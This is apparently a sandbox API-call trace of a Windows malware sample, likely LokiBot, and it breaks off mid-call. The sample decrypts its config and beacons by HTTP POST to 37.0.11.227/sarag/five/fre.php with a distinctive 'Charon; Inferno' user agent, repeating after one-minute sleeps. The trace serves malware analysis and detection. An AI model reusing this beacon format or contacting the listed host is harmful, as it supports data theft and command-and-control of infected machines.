LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0189.747] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0189.747] GetProcessHeap () returned 0x690000 [0189.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0189.747] GetProcessHeap () returned 0x690000 [0189.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0189.748] send (s=0x378, buf=0x6abd08*, len=242, flags=0) returned 242 [0189.748] send (s=0x378, buf=0x6aba40*, len=159, flags=0) returned 159 [0189.749] GetProcessHeap () returned 0x690000 [0189.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0189.749] recv (in: s=0x378, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0189.821] GetProcessHeap () returned 0x690000 [0189.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0189.822] GetProcessHeap () returned 0x690000 [0189.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0189.822] GetProcessHeap () returned 0x690000 [0189.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0189.823] GetProcessHeap () returned 0x690000 [0189.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0189.824] closesocket (s=0x378) returned 0 [0189.824] GetProcessHeap () returned 0x690000 [0189.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0189.824] GetProcessHeap () returned 0x690000 [0189.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0189.825] GetProcessHeap () returned 0x690000 [0189.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0189.826] GetProcessHeap () returned 0x690000 [0189.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0189.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb4c) returned 0x378 [0189.830] Sleep (dwMilliseconds=0xea60) [0189.832] GetProcessHeap () returned 0x690000 [0189.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0189.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.833] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.840] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0189.847] GetProcessHeap () returned 0x690000 [0189.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0189.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.848] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0189.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.849] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.850] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.850] GetProcessHeap () returned 0x690000 [0189.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0189.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.852] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0189.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.852] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0189.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.853] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0189.853] GetProcessHeap () returned 0x690000 [0189.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0189.854] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.854] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0189.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.855] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0189.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.856] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0189.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.861] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0189.861] GetProcessHeap () returned 0x690000 [0189.861] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0189.861] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0189.861] GetProcessHeap () returned 0x690000 [0189.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0189.861] GetProcessHeap () returned 0x690000 [0189.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0189.862] GetProcessHeap () returned 0x690000 [0189.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0189.862] GetProcessHeap () returned 0x690000 [0189.862] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0189.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.864] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0189.876] GetProcessHeap () returned 0x690000 [0189.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0189.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.876] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0189.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.877] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.878] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.878] GetProcessHeap () returned 0x690000 [0189.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0189.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.879] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0189.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.880] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0189.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.881] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0189.881] GetProcessHeap () returned 0x690000 [0189.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0189.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.882] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0189.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.883] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0189.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.884] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0189.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.885] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0189.885] GetProcessHeap () returned 0x690000 [0189.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0189.885] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6add10*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0189.885] GetProcessHeap () returned 0x690000 [0189.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0189.885] socket (af=2, type=1, protocol=6) returned 0x37c [0189.885] connect (s=0x37c, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0189.908] FreeAddrInfoW (pAddrInfo=0x6add10*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0189.908] GetProcessHeap () returned 0x690000 [0189.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0189.908] GetProcessHeap () returned 0x690000 [0189.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0189.909] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0189.910] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0189.910] GetProcessHeap () returned 0x690000 [0189.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0189.910] GetProcessHeap () returned 0x690000 [0189.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0189.911] GetProcessHeap () returned 0x690000 [0189.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0189.911] GetProcessHeap () returned 0x690000 [0189.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0189.912] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0189.913] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0189.913] GetProcessHeap () returned 0x690000 [0189.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0189.913] GetProcessHeap () returned 0x690000 [0189.913] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0189.913] send (s=0x37c, buf=0x6abd08*, len=242, flags=0) returned 242 [0189.914] send (s=0x37c, buf=0x6aba40*, len=159, flags=0) returned 159 [0189.914] GetProcessHeap () returned 0x690000 [0189.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0189.914] recv (in: s=0x37c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0189.990] GetProcessHeap () returned 0x690000 [0189.991] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0189.994] GetProcessHeap () returned 0x690000 [0189.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0189.995] GetProcessHeap () returned 0x690000 [0189.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0189.996] GetProcessHeap () returned 0x690000 [0189.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0189.996] closesocket (s=0x37c) returned 0 [0189.999] GetProcessHeap () returned 0x690000 [0189.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0189.999] GetProcessHeap () returned 0x690000 [0189.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0189.999] GetProcessHeap () returned 0x690000 [0190.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0190.000] GetProcessHeap () returned 0x690000 [0190.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0190.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x164) returned 0x37c [0190.008] Sleep (dwMilliseconds=0xea60) [0190.010] GetProcessHeap () returned 0x690000 [0190.010] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0190.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.011] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.023] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0190.029] GetProcessHeap () returned 0x690000 [0190.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0190.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.030] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0190.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.031] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.032] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.032] GetProcessHeap () returned 0x690000 [0190.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0190.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.051] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0190.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.052] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0190.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.052] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0190.053] GetProcessHeap () returned 0x690000 [0190.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0190.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.053] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0190.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.054] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0190.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.055] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0190.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.056] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0190.056] GetProcessHeap () returned 0x690000 [0190.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0190.056] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0190.056] GetProcessHeap () returned 0x690000 [0190.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0190.057] GetProcessHeap () returned 0x690000 [0190.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0190.057] GetProcessHeap () returned 0x690000 [0190.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0190.058] GetProcessHeap () returned 0x690000 [0190.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0190.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.059] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.063] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0190.076] GetProcessHeap () returned 0x690000 [0190.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0190.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.078] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0190.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.079] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.080] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.080] GetProcessHeap () returned 0x690000 [0190.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0190.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.081] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0190.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.082] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0190.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.083] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0190.083] GetProcessHeap () returned 0x690000 [0190.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0190.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.084] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0190.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.085] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0190.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.086] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0190.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.087] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0190.087] GetProcessHeap () returned 0x690000 [0190.087] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0190.087] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a99d8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0190.087] GetProcessHeap () returned 0x690000 [0190.087] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0190.087] socket (af=2, type=1, protocol=6) returned 0x380 [0190.088] connect (s=0x380, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0190.116] FreeAddrInfoW (pAddrInfo=0x6a99d8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0190.116] GetProcessHeap () returned 0x690000 [0190.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0190.116] GetProcessHeap () returned 0x690000 [0190.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0190.117] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0190.118] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0190.118] GetProcessHeap () returned 0x690000 [0190.118] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0190.118] GetProcessHeap () returned 0x690000 [0190.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0190.119] GetProcessHeap () returned 0x690000 [0190.119] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0190.119] GetProcessHeap () returned 0x690000 [0190.119] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0190.120] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0190.120] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0190.120] GetProcessHeap () returned 0x690000 [0190.120] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0190.120] GetProcessHeap () returned 0x690000 [0190.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0190.121] send (s=0x380, buf=0x6abd08*, len=242, flags=0) returned 242 [0190.122] send (s=0x380, buf=0x6aba40*, len=159, flags=0) returned 159 [0190.123] GetProcessHeap () returned 0x690000 [0190.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0190.123] recv (in: s=0x380, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0190.193] GetProcessHeap () returned 0x690000 [0190.193] HeapFree (in: 